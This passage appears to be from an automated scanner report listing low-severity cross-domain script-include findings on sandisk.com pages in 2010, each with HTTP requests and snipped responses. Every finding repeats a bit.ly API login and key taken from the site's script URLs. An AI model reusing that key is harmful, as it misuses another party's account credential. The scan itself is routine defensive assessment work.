Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15495
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.25. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/employee-volunteering previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/community-engagement/employee-volunteering

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/corporate-social-responsibility/community-engagement/employee-volunteering HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41244
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.26. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/philanthropy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/community-engagement/philanthropy

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/corporate-social-responsibility/community-engagement/philanthropy HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39939
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.27. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/corporate-responsibility

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/corporate-social-responsibility/corporate-responsibility HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40552
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.28. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/corporate-responsibility/

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/corporate-social-responsibility/corporate-responsibility/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40553
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.29. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility/health-and-safety previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/corporate-responsibility/health-and-safety

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/corporate-social-responsibility/corporate-responsibility/health-and-safety HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39566
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.30. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility/labor-and-ethics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/corporate-responsibility/labor-and-ethics

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/corporate-social-responsibility/corporate-responsibility/labor-and-ethics HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39990
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.31. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/environmental-responsibility

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/corporate-social-responsibility/environmental-responsibility HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40998
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.32. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/environmental-responsibility/

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/corporate-social-responsibility/environmental-responsibility/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40999
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.33. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility/environmental-management-system previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/environmental-responsibility/environmental-management-system

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /about-sandisk/corporate-social-responsibility/environmental-responsibility/environmental-management-system HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13522
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.34. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility/facilities previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/environmental-responsibility/facilities

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/corporate-social-responsibility/environmental-responsibility/facilities HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39036
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.35. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility/information-technology previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/environmental-responsibility/information-technology

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/corporate-social-responsibility/environmental-responsibility/information-technology HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40229
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.36. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/product-environmental-compliance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/product-environmental-compliance

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/corporate-social-responsibility/product-environmental-compliance HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40374
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.37. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/product-environmental-compliance/chemical-disclosure previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/product-environmental-compliance/chemical-disclosure

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/corporate-social-responsibility/product-environmental-compliance/chemical-disclosure HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/product-environmental-compliance
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39708
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.38. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/product-environmental-compliance/green-procurement previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/product-environmental-compliance/green-procurement

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/corporate-social-responsibility/product-environmental-compliance/green-procurement HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/product-environmental-compliance
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38735
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.39. http://www.sandisk.com/about-sandisk/management previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/management

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/management HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23148
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.40. http://www.sandisk.com/about-sandisk/management/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/management/

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/management/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23149
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

